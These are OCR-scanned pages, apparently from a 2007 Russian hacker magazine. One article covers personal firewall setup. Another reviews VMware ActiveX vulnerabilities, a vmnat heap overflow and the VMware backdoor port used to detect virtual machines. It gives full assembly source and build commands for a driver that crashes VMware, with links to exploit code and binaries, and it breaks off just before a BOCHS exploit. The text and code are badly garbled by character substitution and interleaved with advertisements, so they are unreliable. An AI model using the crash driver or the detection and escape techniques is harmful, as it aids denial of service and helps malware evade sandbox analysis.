не садясь на измену, чувствовать себя в безопасности, поскольку вероят- 
ностьбыть атакованным через скачанный варез несравненно выше. 

Еще брандмауэр может (и должен) следить за сетевой активностью 
честных приложений, показывая, кто из них ломится в сеть, на какой порт 
и по каким адресам. Например, если мы запускаем Горящего Лиса и он ло- 
мится на Ноте Раде, ранее прописанную нами, то это нормально. Если же 
Лис лезет на МеесІз.тогіЦа.огд . то это тоже нормально, хотя уже весьма 
подозрительно, но, вообще говоря, программа подобного уровня вправе 
обращаться ксвоему сайту, и никакого криминала здесь нет. Авотесли 
игра типа тетриса пытается открыть какой-то порт (например, порт 666), то 
с вероятностью, близкой кединице, в ней запрятана закладка и оттакой 
программы можно ожидать всего чего угодно, так что лучше стереть ее на 
хрен или ограничиться тем, что на вопрос брандмауэра ответить: «Нет». 
Вообще говоря, пробить брандмауэр изнутри очень просто. Зловредная 
программа имеетв своем арсенале массуспособовустановки канала связи 



Что может и не может брандмауэр! 
Брандмауэрможет: \ ;; 



• разделить интра- и интернет, запретив доступ к ресурсам домашней 
сети из внешнего мира (это и есть основная функция файрвола); 

• закрытьодин или несколько локальных портов, заблокировав подклю- 
чение к ним со всех (или только с некоторых) внешних узлов; 

• заблокировать ряд ІР-адресов, запретив локальной машине подклю- 
чаться к обозначен ному сп иску удаленных узлов; 

• вести мониторингсетевой активности, записывая в лог-файлы инфор- 
мацию о том, какая программа в какое время куда подключалась и какие 
данные принимала/передавала; 

• запретить честным программам использовать сетевые ресурсы и попы- 
таться противостоять нечестным программам, специально сконструиро- 
ванным для обхода брандмауэра; 

• сделать компьютер невидимым для хакера, запретив ответы на істр 
ріпд и предприняв ряд других мер в этом направлении; 

• с некоторой вероятностью обнаружить факт внедрения зловредных 
программ в доверенные процессы (такие, например, как Рі гебох, Опера, 

ІЕ), которым разрешен бесконтрольный доступ в сеть; 

• обеспечить проверку целостности исполняемых файлов и динамичес- 
ких библиотек, в которыетакже могут внедряться зловредные программы; 

• распознать некоторые виды удаленных атак (например, сканирование 
портов). 



Брандмауэр не может: 



• зафиксировать фа кт успешной атаки; 

• предотвратить вторжение малвари через незалатанные дыры в про- 
граммном обеспечении; 

• запретить пользователю запускать файлы, полученные из ненадежных 
источников (например, варезных серверов), активно используемыххаке- 
рами для распространения малвари; 

• удержать пользователя от глупости или принятия неверного решения. 



судаленным узлом, и брандмауэр ей не помеха. Тем не менее основная 
масса малвари написана пионерами, которые ни хрена не шарятвтеме, и 
потому попытки открытия Ьаск-сіоог портов (через которые хакеры и рулят 
захаченными компьютерами) отлавливаются брандмауэрами молние- 
носно. Более грамотная малварь внедряется в процессы доверенных 
приложений (например, в ІЕ, Горящего Лиса, Оиііоок Ехргезв, ТЬе Ваі, 
еіс), осуществляя обмен данными от их имени. Большинство брандмау- 
эровустанавливаетфактвнедрения (хотя они и необязаны это делать), 
однако если малварьуже находится на компьютере, тоу нее есть все шан- 
сы обломать брандмауэр, каким бы крутым он ни был. Впрочем, учитывая 
качество нынешней малвари, брандмауэры побеждают чаще. 

ПРИСТУПАЕМ К НАСТРОЙКЕ БРАНДМАУЭРА 

Вообще говоря, конфигурировать брандмауэр методомтыка — занятие 
для экстремалов. Автор и рад бы дать пошаговое руководство по настрой- 
ке всех брандмауэров, но не может этого сделать, поскольку брандмауэ- 
ров слишком много. Хотя принципы их конфигурации довольно схожи, и 
все различия упираются в интерфейс. 

Начнем с портов. Вернее сказать, вернемся к нем. Охужэти порты... 
Некоторые руководства смело предлагают раз и навсегда закрыть порты, 
используемые троянскими лошадьми, устанавливающими Ьаск-сіоог’ ы. 
Списки таких портов выглядят довольно внушительно. Троянцев сейчас 
много, и все они используют различные порты. Ну, положим, закроем мы 
их. Что это нам даст?! Аничего! Эти порты итакзакрыты поумолчанию. 
Проникнуть сквозь них малварь не сможет, и, чтобы установить Ьаск-сіоог, 
ей придется либо прикинуться полезным варезом, который установит на 
компьютер сам пользователь, либожезаюзать какую-нибудь незалатан- 
ную дыру. Естественно, послетого как малварь обоснуется на компьютере, 
она попытается открыть порт, ожидая поступления дальнейших инструк- 
ций отхакера. И, если этот порт закрыт на брандмауэре, малварьоблома- 
ется, а брандмауэр выдаст предупреждение, дескать, воттакаятутзараза... 
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Іервь МЗВІазІ ломится науязвимый 135-й порт, закрытый на 
рандмауэре 



Интернет буквально кишит подобными статьями, от непро- 
ходимой тупости которых мыщъх уже устал. Короче. Внятно, 
доступно и на пальцах. Малварьуже давно не использует 
фиксированные порты, а выбираетих случайным (или псев- 
дослучайным) образом. Это раз. Атеперьдва: приустановке 
любого ТСР/ІР-соединения на самом деле используется не 
один, а два порта: заранее известный фиксированный порт 
удаленного узла (например, в случае ѴѴѴѴѴѴ это порт 80) и 
локальный порт, автоматически открываемый операционной 
системой на нашей машине и выбираемый произвольным 
образом (естественно, из числа свободных). Существует 
вероятность (причем большая), что при установке легального 
ТСР/ІР-соединения нормальной программой операционная 
система назначиттроянский локальный порт, который закрыт 
брандмауэром! Это приведет ктому, что: а) соединение не 
будет установлено; б) брандмауэр поднимет визг, а пользо- 
ватель, хватаясь за сердце, начнет искать несуществующего 
трояна, скачивая самые последние версии антивирусов, но 
так и не найдетего, поскольку... тревога была ложной. 
Потойже причине нельзя закрыть все неиспользуемые 
порты, как советуют некоторые авторы, поскольку при этом 
мы вообще не сможем установить ни одного ТСР/ІР-соедине- 
ния! В таком случае какие же порты нужно закрывать?! Ответ: 
если (допустим) утебя домашняя локальная сеть и ргоху- 
сервер на 8080-м порту, через который выходят в интернет 
остальные домочадцы, то точно таким же образом через него 
могут выходить в Сеть и все другие обитатели интернета. За- 
чем? Ну мало ли... Даже если ргоху не анонимный (то есть не 
подходит для атак от чужого имени), то внутрисетевой трафик 
у большинства провайдеров обычно значительно дешевле 
или вовсе бесплатный. Вот юные хакеры и рыщут в поисках 
халявы. Вообще-то, большинство ргоху-программ позволяет 
установить пароль на вход, но... далеко не все утилиты, рабо- 
тающие через ргоху, поддерживают та кой режим. 

ОК. Другой ход. В настойках ргоху должен быть список разре- 
шенных интерфейсов, с которыми он может работать. Обмен 
пакетами со всеми остальными интерфейсами запрещен. 
Интерфейс в данном случае — это (в грубом приближении) 
идентификатор сетевого устройства. Сетевая карта, модем 
— все они имеютсвои интерфейсы. Короче, выбираем интер- 
фейс сетевой карты, подключенной кдомашней локальной 
сети, и запрещаем все остальные. Красота! Нуда... красота. 
Местами. А местами безобразие сплошное. Если ОЭЕ-модем 
имеет ЕіЬегпеі-порт, воткнутый в свитч (вполнетипичная кон- 
фигурация домашней локальной сети), то у нас имеется всего 
один интерфейс какдля интернета, так и для локальной сети. 
Или вот: мыщъх использует ЕШп НТТР Ргоху, позволяющий 
использовать всего один интерфейс для работы. Аему необ- 



ходимо выбратьдва: интерфейс домашней локальной сети 
и интерфейс виртуальной сети ѴМѴѴаге, которой тоже нужен 
доступ в интернет. Можно, конечно, выбрать другой ргоху- 
сервер, но проще в настройках брандмауэра указать список 
ІР-адресов домашней локальной сети (и виртуальной сети), 
с которых разрешен доступ к порту ргоху-сервера (в данном 
случае это 8080-й порт). Если же утебя нет ргоху-сервера, то 
просто не морочьсебе голову этим вопросом. Примечание: 
модемы с ЕОіегпеі-портами обычно имеют встроенный 
брандмауэр, позволяющий разграничить доступ клокаль- 
ной сети; на предметего настройки кури прилагающиеся к 
модему мануалы. 

Теперь перейдем к расшаренным ресурсам, о которых мы 
уже говорили. Брандмауэры в массе своей не блокируют 
к ним доступ из интернета по умолчанию, благодаря чему 
атаки осуществляются ударными темпами и компьютеры 
ложатся стройными могильными рядами. Лучше вооб- 
ще не иметь никаких расшаренных ресурсов, используя 
персональные ЕТР-серверы, которые как раз и предна- 
значены для обмена файлами, но... объяснить среднеста- 
тистическому пользователю типа «жена», что такое ЕТР 
намного сложнее, чем найти копию ѴѴІпсіоѵѵб без багов. 

Так что приходится шарить. Ну и шарь себе на здоровье, 
только в настройках брандмауэра найди пункт, касающий- 
ся доступа к шарам из интернета, и распорядись им по 
обстоятельствам. 

И последнее (но самое важное). Практически все бранд- 
мауэры поддерживаютсписокдоверенных приложений, а 
при выводе запроса на подтверждение имеют галочку «Не 
показывать это сообщение в дальнейшем». Так вот! На- 
стоятельно рекомендуется эту галочку не трогать! Конечно, 
частые запросы на подтверждение очень раздражают, но 
зато позволяют держать ситуацию под контролем. Тоже 
самое относится и к списку доверенных приложений. До- 
пустим, заносимтуда ІЕ, чтобы брандмауэр не задалбливал 
нас дурацкими вопросами. Теперьзапускаем какое-нибудь 
приложение, которое неожиданно вызываетбраузер по 
умолчанию (в данном случае ІЕ) и передает через него неко- 
торую информацию на удаленный узел, например серийный 
номердля подтверждения его (не)валидности. Авотесли при 
каждом запуске ІЕ будет выпрыгивать запрос от брандмау- 
эра, этот фокус уже не пройдет! 

Попутно запрети своему компьютеру посылать эхо-ответы 
(опция ІСМР ЕСНО в брандмауэре), чтобы неприятели не 
запинговалитебя до смерти, за короткое время сгенериро- 
вав до фига мегабайттрафика и нетолько затормозив работу 
компьютера, но еще и посадивтебя на бабки, ведьтрафик на 
большинстветарифов стоит денег! 

ПОСЛЕДНИЙ СОВЕТ 

Брандмауэр (даже персональный) — это все-таки не ІЕ, и 
даже не Горящий Лис, а программный пакет совсем другого 
порядка, требующий знания и понимания протоколов, на ко- 
торых держится интернет. Поэтому надо хорошо разобраться 
в стеках сетевых протоколов. В противном случае навряд ли 
можно ожидать осмысленного ответа на вопрос, заданный 
пользователю брандмауэром. Человеческий фактор — самое 
слабое звено, и никакими техническими ухищрениями его не 
усилишь. Банальность, конечно, но с каждым годом она все 
актуальнее и актуальнее. "! - 



/«\ 







> ѵѵагпіпд 

Внимание! 

Наличие персональ- 
ного брандмауэра 
не освобождает 
от необходимости 
установки заплаток 
и в общем случае 
не останавливает 
малварь, лезущую в 
незалатанные дыры. 




> сіѵсі 

Пора подобрать 
стоящий файрвол. 
Коллекция бранд- 
мауэров на диске 
— тебе в помощь. 
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КРИС КАСПЕРСКИ 



Западлянки в стиле сгаск 



^ ВЗЛОМ 





ВИРТУАЛЬНЫЕ МАШИНЫ (В0СН5, ѴМѴѴАРЕ) ПРЕДНАЗНАЧЕНЫ ДЛЯ УСИЛЕНИЯ 
БЕЗОПАСНОСТИ КОМПЬЮТЕРА И АКТИВНО ИСПОЛЬЗУЮТСЯ ДЛЯ ЗАПУСКАПО- 
ДОЗРИТЕЛ ЬНЫХ ПРОГРАММ, ИССЛЕДОВАНИЯ ВИРУСОВ, ЧЕРВЕЙ, ЭКСПЛОЙТОВ И 
Т.Д. ОДНАКО, КАКИ ЛЮБОЕ ДРУГОЕ ПРОГРАММНОЕ ОБЕСПЕЧЕНИЕ, ВИРТУАЛЬНЫЕ 
МАШИНЫ НЕСВОБОДНЫ ОТ ОШИБОК И ПОТОМУ ПРЕДСТАВЛЯЮТ СОБОЙ ВЕСЬМА 
СОБЛАЗНИТЕЛЬНУЮ МИШЕНЬДЛЯ РАЗНООБРАЗНЫХ АТАК, КОТОРЫМ И ПОСВЯЩЕН 
НАШ СЕГОДНЯШНИЙ ВЫПУСК. 



□- 



-□ 



ѴМѴѴаге: удаленное 
исполнение 
произвольного 
кода — I 



Вгіе* 

29 июля 2007 года хакер по 
кличке саИАХ, являющий- 
ся членом весьма про- 
дуктивной аргентинской 
исследовательской груп- 
пы 6000РЕІ_І_А5 5 е с и гі Ту 
ПезеагсН Теат [ ШрѴ/дооЩеиаБ.вЬеЦсосІе.сопп.аг І . обнаружил, 
что в состав виртуальной машины ѴМѴѴаге входит любо- 
пытный АсЛѵеХ- компонент. Он реализован в динамической 
библиотеке ѵіеІіЬ.сШ, которая экспортирует многие потенци- 
ально небезопасные методы, позволяющие манипулировать 
с основной операционной системой и при этом не прове- 
ряющие, откуда происходит вызов: из родного приложения 
или из зловредного кода. Одним из таких методов является 
БіагіРгосезз, позволяющий (как и следует из его названия) 
порождать процессы от имени текущего пользователя со все- 
ми его привилегиями. И все... еще одна жертва добавлена в 
коп ил ку ха кера , подробнее о которой можно прочитать на 
уѵ\ллл/.зесигйуЩсиз.сот/ЬісІ/251 1 8 . 



І * 

■ ■ Г . I 




Тагдеіз 

В пресс-релизе, распространенном группой бОСЮРЕНАБ, упоми- 
нается только ѴМѴѴаге 6.0, однако я подтверждаю, что уязвимость 
присутствует и в версии 5.5, а вот версия 4.5 неуязвима. Причем для 
успешного вызова АсЛѵеХ-компонентов нам понадобится ІЕ с вер- 
сией не ниже 6.0. А вот Лис и Опера в этом отношении совершенно 
безопасны. 

Ехріоіі 

На дискеты найдешь фрагментэксплойта, опубликованный группой 
ООООРЕЕДАБ и доступный на следующих сайтах: ѵѵѵѵѵѵ.тіІѵѵОгт. 
сот/ехрІоіів/4244 . ѵѵѵѵѵѵ.зесигіЫосиз.сопп/сІаІа/ѵиІпегаЬіІШез/ 
ехрІюйз/251 1 8.НІППІ а также на моем сервере: ЬирѴ/пегиті.огд. 
ги/воигІ2/ЬаскА/тѵѵаге-ЫсІ-251 18.Ыт . 

Зоіиііоп 

Официальное лекарство еще находится на стадии разработки, пока же 

МОЖНО: 

а) ничего неделать, поскольку поумолчанию ІЕ не будет выполнять 
АсбѵеХ-код; 

б) активировать Кііі-Ьіі для сізісі-элемента {7В9С5422-39АА-4С21 
-ВЕЕЕ-645Е42ЕВ4529} в соответствии с рекомендациями М іеговой: 
Ьир://виррогЕтісго5ОЙ.сопп/кЬ/240797 ; 

в) разрегистрировать библиотеку ѵіеііб. 611 через гедзѵг32 — ѴМѵѵаге 
ѴігЩаПтаде Ебіііпд работать, конечно, перестанет, нуда невелика беда. 
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<алькулятор, запущенный хакером на удаленной машине через дыру 
в АсбѵеХ- компоненте, входящем в состав ѴМѴѴаге 



Тагдеіз 

Несмотря нато что и Бесигііу Росиз, и ѲОСЮРЕИ 
Теат упоминают однулишь ѴМѴѴаге 6.0, я подтве|>^аф| 
присутствует и в более ранних версиях, в частное 
по-прежнему остается неуязвимой. Также эта п р (тоТШ І -и е'-ра I: п р ю ецо-а- 
няется на тех, кто использует ІЕ 5.0 или альтернативные браузеры типа 
Горящего Лиса и Оперы. 



ѴМѴѴаге: удаленное исполнение произ- 
вольного кода — II 

Вгіе* 

30 июля 2007 года, то есть буквально на следующий день после обна- 
ружения дыры в ѴМѴѴаге, все та же аргентинская группа 80СЮЕЕІ_1_А5 
Зесигііу РезеагсИ Теат обнаружила еще два небезопасных метода 
в динамической библиотеке ѵіеііб. сііі. Ими на этот раз оказались 
СгеаіеРгосезз и СгеаіеРгосеззЕх, которые позволяютзапускать про- 
цессы с правами пользователя, зашедшего на хакерскую страничку, 
начиненную зловредным кодом, или получившего НТМб-письмо по 



Ехріоііз 

На диске ищи очередной фрагмент те кета эксплойта, опубликован- 
ный группой Ѳ0СЮРЕИА5 и доступный на следующих сайтах: 
ѵѵѵѵѵѵ.ті[\л/0гт.сот/ехр[оИ:5/4244 . ЬНрѴ/гіоѵѵпІоа гіз.зесигіЫосиз. 
сот/ѵиІпегаЬіІі1:іе5/ехрІоі1:5/251 31 .Ыті . а также на моем сервере: 
Ьир://пе2иті.огд.ги/5оигІ2/Ьаск/ѵтѵѵаге-Ыб-251 18.Ьіт. 

Боіиііоп 

Решение полностью аналогично предыдущему случаю, стой лишь раз- 
ницей, что теперь мы имеет дело с сізіб-объектом с идентификатором 
{0 Р748РР Е-0597-443С-8596-71 854С5ЕА20А}. 



о 



-□ 




Демонстрация работы эксплойта, создающего файл агЬйгагу_Ж.е.М в 
корневом каталоге диска С: 

ѴМѴѴаге: перезапись произвольного файла 

Вгіе* 

28 июля 2007 года аргентинской исследовательской группой 
Ѳ0СЮЕЕІ_І_А5 Зесигку РезеагсЬ Теат... нуты, короче, в курсе. В этот 
день уже известный нам хакер по кличке са ПАХ обнаружил свою 
первую дыру в АсбѵеХ- компоненте, входящем в состав ѴМѴѴаге. 
Дыра конструктивно реализована в виде динамической библио- 
теки ІпІгаРгосе55І_оддіпд.сШ, имеющей в своем арсенале метод 
5еІІ_одРіІеМате, задающий имя файла, в который виртуальная машина 
будет записывать свой лог. Почему мы отошли отхронологической 



последовательности открытия дыр?Уязвимость, обнаруженная первой, 
оказалась в самом хвосте обзора! Ну и что с того, что в хвосте?! Хвост, 
между прочим, очень даже хорошее место длятакой незначительной 
дыры. Конечно, перезапись файлов (сучетом наличия ужертвы прав 
ната кую операцию) — достаточно мощное оружие для йоЗ-атаки, но 
забросить зЬеІІ-код наудаленную машину весьма проблематично, 
поскольку мы не можем напрямую воздействовать на содержимое Іод- 
файла. Подробнее смотри на \ллллл/.зесигіІуіюси5.сот/Ьіб/251 10 . 

Тагдеіз 

Поразительно, но свои первые исследования са ПАХ проводил на 
ѴМѴѴаге ѴѴогкзіабоп 5.5.3 Ьіііісі 42958, но потом внезапно «забыл» о ней, 
переключившись на версию 6.0, несмотря нато что дыры есть и втой и 
в другой! 

Ехріоііг 

На дискеты найдешь еще один фрагмент исходного текста эксплойта, 
опубликованный группой Ѳ000РЕІ_І_А5 и доступный на следующих сай- 
тах: ѵууушіііІл^уШ^ ЬирУ/бомпІоабз.зесигіМосиз. 

сот/ѵи[пегаЬі!Ліез/ехр[оіі5/251 1 0.ЫтІ . а также на моем сервере: 
Ьир://пе2иті.огд.ги/5оигІ2/Ьаск/ѵтѵѵаге-Ыб-251 ІО.Ыт . 

Боіиііоп 

Решение аналогично предыдущему, стой лишь разницей, что 
идентификатор сізісі на этот раз равен {АР1 3 В07Е-28А1 -4САС-9С9А- 
ЕС582Е354А24}. 
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)дна гостевая система убивает все остальные и 
:носит крышу ѴМѴѴа ге 



^ ВЗЛОМ 



Виртуальная машина в состоянии сна, из которого уже нет возврата 



Подрыв виртуальных машин изнутри 

Виртуальные машины активно используются в качестве полигона для 
исследования всякой вредоносной заразы вусловиях, приближенных к 
боевым, чтозаразе, естественно, не нравится, и потому она ведет атаку в 
двух направлениях. Первое (и главное) заключается в попытке вырваться 
из-за застенков виртуальной машины, проникнув в основную операци- 
онную систему и превратив ее в труху. Второе — в создании такого кода, 
который бы работал только на живом железе, а под виртуальной машиной 
либо выполнялся неправильно (задача минимум), либо сокрушал вирту- 
альную машину (задача максимум). 

Уязвимости в виртуальных машинах есть, пускай, не втаких больших 

«ДЕФЕКТЫ ПРОЕКТИРОВАНИЯ ПРИВЕЛИ 
КТОМУ, ЧТО УКАЗАННАЯ СЛУЖБА ОКАЗА- 
ЛАСЬ НЕ В СОСТОЯНИИ ПЕРЕВАРИВАТЬ 
СПЕЦИАЛЬНЫМ ОБРАЗОМ СНАРЯЖЕН- 
НЫЕ РТР-ЗАПРОСЫ ЕРРТ И РОРТ, ВЫЗЫ- 
ВАЯ ПЕРЕПОЛНЕНИЕ» 

количествах, как в операционных системах семейства ѴѴІпсіоѵѵб. Однако 
как жен щи на не может быть наполовину беремен ной, так и виртуальная 
машина небывает«в целом надежной». Достаточно всего лишьодного 
прецедента, чтобы исследователи навсегда потеряли доверие к вирту- 
альным машинам. 

И такой прецедент действительно имел место, когда в декабре 2005 года 
Тіт Збеііоп опубликовал на форуме Риіі-сіівсіовиге ( ЬирУ/ІізІз.дгок.огд. 
ик/рірегтаі[Лц[[-сІІ5с[о5цге/2005-РесетЬег/040442.Ыт[ ) сообщение 
о наличии удаленной дыры в службе Ѵт пар реализованной в испол- 
няемом файле ѵтпаі.ехе, входящем в состав ѴМѴѴаге ѴѴогкзІабоп 5.5.0, 
ѴМѴѴаге ѲБХБегѵег, ѴМѴѴаге ЕБХБегѵег, ѴМѴѴаге Асе и ѴМѴѴаге Ріауег. К 



слову сказать, достаточно многие кодо ко патели до сих пор (то есть в 2007 
году) используют ѴМѴѴаге 4.5, которая их полностью устраивает. 

Дефекты проектирования привели ктому, что указанная служба оказа- 
лась не в состоянии переваривать специальным образом снаряженные 
РТР-запросы ЕРРТ и РОРТ, вызывая переполнение динамической 
памяти (также называемой кучей) в службе паій с возможностью засылки 
збеИ-кода, исполняемого на основной (Ьобі) операционной системе, со 
всеми вытекающими последствиями. Кстати говоря, атака осуществима 
нетолько из-под виртуальной машины, но и из внешней сети (интра- и/ 
или интернет), если, конечно, виртуальная сеть сконфигурирована соот- 
ветствующим образом (устанавливаемым поумолчанию), а не ограниче- 
на пересылкой данныхтолько между виртуальными машинами. 

Более подробную информацию потеме можно найти на ѵѵѵѵѵѵ.БесигіМосиБ. 
сот/ЬісІ/1 5998 . Для исправления дефекта рекомендуется скачать новую 
версию с ѵѵѵѵѵѵ.ѵтѵѵа ге.сот/сіоѵѵпіоасі . а если это по каким-то причинам 
невозможно/нежелательно, то воспользоваться костылем, описанным в 
базе знаний ѴМѴѴаге: ѵѵѵѵѵѵ.ѵппѵѵаге.сопп/Биррогі/кЬ (Апзѵѵег ІР 2002 ). 
Кстати говоря, это была не первая дыра в ѴМѴѴаге, и если поднять архивы, 
то можно обнаружить, что еще в самой ранней версии ѴМѴѴаге 1.0.1, 
доступной только для Ыпих, присутствовала ошибка переполнения, 
обнародованная на ВидТгад в июне 1999 года хакером по имени Оазоп 
РИоасІБ (іаБОП.гбоасІБЙБаЬегпеЦпеІ;). Исходный кодэксплойта можно 
скачать с Бесигку Босиз'а: ѵѵѵѵѵѵ.БесигіІѵІ'осиБ.сопп/сІаІа/ѵиІпегаЫІІЦеБ/ 
ехрІоіІБ/ѵтѵѵа ге.с . И хотя он давно потерял свою актуальность (дефект 
был исправлен в следующей версии — 1 .0.2), главное — сам факт! 

Парад дыртем временем продолжается. Было бы утомительно (да и 
неинтересно) останавливаться на каждой из них, смакуя все подробности. 
Достаточно сказать, что последнее сообщение о переполнении буфера в 
ѴМѴѴаге опубликовано совсем недавно и датируется 6 апреля 2007 года, 
затрагивая ѴМѴѴаге Е5Х5егѵег3.0/3.0.1 . И хотя какие-либотехниче- 
ские детали на данный момент отсутствуют (информация об уязвимости 
опубликована самими разработчиками, которые совершенно не хотят 
раскрывать интимные подробности своей жизни), анализ заплаток, до сих 
пор, кстати, не выпущенных, позволяетлокализовать положение дыры 
и написатьэксплойты. Такчто следи за новостям на ѵѵѵѵѵѵ.БесигіЫосиБ. 
сот/ЬісІ/23322 . Короче говоря, верить ѴМѴѴаге нельзя, и, прежде чем 
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отлаживать на ней очередного червя, не помешаетустановить все 
последние обновления. С другой стороны, более древние версии 
выглядятменее навороченными и потенциально более устойчивы 
к прорыву за пределы виртуальной машины. То есть традиционные 
меры предосторожности не помешают. Ведь когда-то червей отла- 
живали непосредственно на основных компьютерах, и в большин- 
стве случаев ничего трагичного при этом не происходило. 

Ладно, будетсчитать, что с прорывом за пределы ѴМѴѴаге мы 
разобрались, и перейдем ко всевозможным пакостям внутри нее. 
Следующий код вызываетостановку виртуальной машины (что 
равносильно команде Роѵѵег/ЗиврепсІ в главном меню виртуальной 
машины), однако после пробуждения она, увы, оказывается безна- 
дежно зависшей, и поэтому приходится перезагружаться. 

ИСХОДНЫЙ КОД ДРАЙВЕРА ѴМѴѴАКЕ-СКА5Н.А5М, ВГО- 
НЯЮЩЕГО ВИРТУАЛЬНУЮ МАШИНУ В СОН, ИЗ КОТОРОГО 
ЕЙ УЖЕ НЕ ПРОСНУТЬСЯ 

.686 

.тосіеі ТІаО, зОсІсаІІ 
. сосіе 



Т Р П Р ГТ> П Н ИНТЕРНЕТ 

I ІІІЬФиП ггшг ОЧЕНИ? ЁЁСПЛДНО 



* Подключение - «р люйем мосГе 
Нй-СКВЫ И МйеК&ОСгійН Ш. 

* Срок подключения в Нос нее - 14 дней,, 
в Мо^иэпской -пй л Р - от 14 до 30 дней. 

» Установка прямого мсековекого 
телефонного нам в ре 

* Многонеичл «ыныч тодчфонныо нс мер л 

* ЕР-Тилвфония 

* Выделенный л мним Интернат 



БгіѵегЕпРгу ргос 

шоѵ еах, 110 
шоѵ еЪх, 3 
іпЕ 8 0Ь. 

шоѵ ах, 6с81]т 
шоѵ сЬс, 10041т 
оиД сіх, ах 
хог еЬх, еЬх 
хог еах, еах 
іпс еах 
іпЕ 8 0Ъ. 

шоѵ еах, 0С0000182Л; ЗТАТІІЗ_БЕѴІСЕ_ 

ССЖЕ I СИКАТ I ОЫ_ЕККОК 
геЕ 

БгіѵегЕпЦгу епсір 
епсі БгіѵегЕпРгу 

Компилируется драйвер средствами ЫТ ййК и делается это вполне 
стандартной командной стройкой следующего содержания: 



МОТОЗАМЕНА 



Быстрый какал, новые возможности 
широкополосного доступа 
с Моіогоіа Сапору 

1*9 М 



о 



Безлицензионные 
радиостанции 
Моіогоіа Т4502 в подарок 



РМ Телеком 
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ВОСНЗза работой 



«НАЗЕСІШІТѴРОСІІЗ’Е ЗНАЧИТСЯ ВСЕГО 
ОДНА ОШИБКА ТИПА ПЕРЕПОЛНЕНИЯ 
БУФЕРА, ВЫЗЫВАЮЩАЯ ОТКАЗ В ОБ- 
СЛУЖИВАНИИ, КОТОРАЯ ОТНОСИТСЯ К 
ВЕРСИИ ВОСН52.3. ОБНАРУЖЕННАЯ В 
КОНЦЕ МАЯ 2007 ГОДА, ОНАВСЕ ЕЩЕОС- 
ТАЕТСЯ ДОСТАТОЧНО АКТУАЛЬНОЙ - ДА- 
ЛЕКО НЕ ВСЕ ПОЛЬЗОВАТЕЛИ ВОСНЗ'А 
УДОСУЖИЛИСЬ СКАЧАТЬ ЗАПЛАТКУ» 

ті /поіодо /с /соТТ ѴТШагеЗЬ . азт 

Ііпк /сігіѵег /базе : 0x10000 /а1ідп:32 /оиЬ : ѴТШагеЗЬ . 

зуз /зиЬзузЬет: паЬіѵе ѴМѴТагеЗЬ . окд 

Для загрузки драйвера на лету хорошо подходит бесплатная утилита 
ѵѵ2к_ІоасІ.ехе, написанная Свеном Шрайбером и прилагаемая ккниге 
«Недокументированные возможности ѴѴІпбоѵѵв 2000». Те, у кого этой книги 
нет, могут скачать утилиту с моего сайта: ЬирѴ/пегиті.огд.ги/зоигіг/ 
Наск/ѵѵ2к ІоасІ.гір . Рядышком лежат исходные тексты драйвера-убийцы 
и готовая бинарная сборка (на тот случай, если под рукой не окажется N1 
й й К) : ЬирѴ/пегиті.огд.ги/воигіг/Ьаск/ѵппѵѵа ге-сгазЬ.Щр . 

Естественно, ЫТООК — это не догма. С ничуть не меньшим успехом можно 
использовать, например, РА5М или даже засунуть ассемблерный код в 
загружаемый модуль ядра и натравить его на Ыпих. 

При этом ѴМѴѴаге конкретно поедет крышей и аварийно завершит 
работу всех гостевых машин с выдачей ругательного диалогового окна с 
надписью «*** ѴМѵѵаге ѴѴогквШбоп іпіегпаі гтюпДогеггог***» и с кучей 
ненужной технической информации. 

К то му же ѴМѴѴаге поддерживает специальный недокументированный 
Ьаск-боог интерфейс, позволяющий гостевым операционным системам 
управлять виртуальной машиной. Это дает зловредному коду возможность 
определить, что он исполняется отнюдь не на живом железе, а работает 
под ѴМѴѴаге, которую посредством того же Ьаск-боог интерфейса можно 
отправить в глубокий даун. 

Васк-боог интерфейс был детально исследован японским хакером по имени 
Каіо, который описал его на своей страничке: ШрУ/сЫісЬаЬаЬіпЩвеек. 
содр/ѵтѵѵа ге/ЬасксІоог.ЩтІ . В общих чертах все выглядит приблизительно 
так. В регистр ЕАХзаносится «волшебный пирожок», представляющий 
собой константу 56405868Н, после чего в СХ помещается номер команды, а в 



ЕВХ — ее параметры (описания команд вместе с параметрами можно найти 
на странице у Каіо). После этого осуществляется запись (или чтение) порта 
5658Н, через который, собственно говоря, и происходит взаимодействие 
гостевой операционной системы с виртуальной машиной. 

ПРИНЦИП РАБОТЫ ВАСК-РООК ИНТЕРФЕЙСА ѴМѴѴАКЕ 



моѵ 


ЕАХ, 


564Б5868А 


«волшебный пирожок» 


*/ 


МОѴ 


СХ, 


номер команды 


МОѴ 


ЕВХ, 


параметры команды 


МОѴ 


БХ, 


56586 


ѴМѵѵаге : 


І/О Рогб 


*/ 


Ш 


ЕАХ, БХ 


(ог ОБТ БХ, ЕАХ) 



Естественно, можно (и нужно) пройтись по коду ѴМѴѴаге Ьіеѵѵ’ом, найти 
в ней все константы 56405868И и заменить их чем-нибудь другим. Для 
большей надежности то же самое следует проделать с номером порта. 
Работоспособности ѴМѴѴаге это не нарушит, зато зловредный код поте- 
ряет возможность пролезть через Ьаск-боог интерфейс. 

Впрочем, ѴМѴѴаге уже достаточно скомпрометировала себя, и спасти ее 
репутацию сможет разве что чудо. Но чудес, как известно, не бывает, а 
вот конкуренты имеются в большом ассортименте. 

К примеру, рассмотрим весьма популярный эмулятор В0СН5 ( ЬосЬв. 
зоигсеіюгде.пеі: ). Он ужасно тормозной, зато бесплатный и, что самое 
важное, за все время своего существования не обнаруживший ни 
одной дыры, позволяющей зловредному коду вырваться за пределы 
виртуальной машины. Другая полезная вкусность — встроенный отлад- 
чик, работающий на уровне виртуальной машины и потому совершенно 
невидимый для отлаживаемого кода. Короче говоря, с точки зрения 
безопасности весь потенциально опасный код лучше всего исследовать 
под ВОСНЭ’ем. 

Однако В0СН5 все-таки содержит несколько некритических ошибок 
переполнения, которые позволяют гостевой операционной системе 
вызывать аварийное завершение работы эмулятора, препятствующее 
отладке мал вари. Но на саму операционную систему зловредный код 
воздействовать не может, точнее, пути такого воздействия неизвестны. 
В частности, на ЭесигДу Еосив’е значится всего одна ошибка типа 
переполнения буфера, вызывающая отказ в обслуживании, которая 
относится к версии В0СН5 2.3. Обнаруженная в конце мая 2007 года 
хакером по кличке Таѵів Огтапбу, она все еще остается достаточно ак- 
туальной — далеко не все пользователи ВОСНЭ’а удосужились скачать 
с сайта заплатку. 

Ниже приводится исходный текст эксплойта, позаимствованный с 
Ыір://сІоѵѵп[оасІ5.5есигіЫосцБ.сот/ѵц[пегаЫ[іііе5/ехр[оіІ5/24246.с : 

